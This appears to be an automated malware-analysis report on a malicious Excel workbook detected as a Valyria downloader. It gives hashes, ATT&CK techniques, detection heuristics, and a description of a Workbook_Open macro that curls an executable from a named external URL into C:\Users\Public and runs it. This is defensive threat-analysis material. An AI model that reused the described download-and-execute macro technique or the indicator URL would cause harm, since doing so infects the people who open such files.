Valyria Office (OLE) / .XLS malware analysis — malicious · 348d37d813ca44c3

MALICIOUS

Office (OLE) / .XLS

26.5 KB Created: 2022-01-08 17:02:42 Authoring application: Microsoft Excel First seen: 2022-12-04

MD5: a3a7be7f733771ff24d6286ea49db98c SHA-1: 9017cdc08851f162ae8ca54cfde0841526f4ebbf SHA-256: 348d37d813ca44c373ddd848e39f0ec422982b57e23b502f5ed10a5c86829485

240 Risk Score

Malware Insights

Valyria · confidence 95%

MITRE ATT&CK

T1059.005 Service Execution: Visual Basic T1059.003 Command and Scripting Interpreter: Windows Command Shell T1105 Ingress Tool Transfer

The Workbook_Open macro in the VBA script executes a command that uses curl to download 'putty.exe' from 'https://thearth.li/~sgtatham/putty/latest/w32/putty.exe' and saves it as 'C:\Users\Public\pin77.exe'. The script then attempts to execute the downloaded file. This indicates a downloader functionality, consistent with the ClamAV detection of 'Xls.Downloader.Valyria-10008445-0'.

Heuristics 6

ClamAV: Xls.Downloader.Valyria-10008445-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Downloader.Valyria-10008445-0
Workbook_Open macro high OLE_VBA_WBOPEN

Workbook_Open macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
cmd.exe reference in VBA high OLE_VBA_CMD

cmd.exe reference in VBA
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas` `24add1ea58e1c50679ff8d5562dbf748028a2cdef9edf3d20de068b4fb2c7ac9`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1266 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.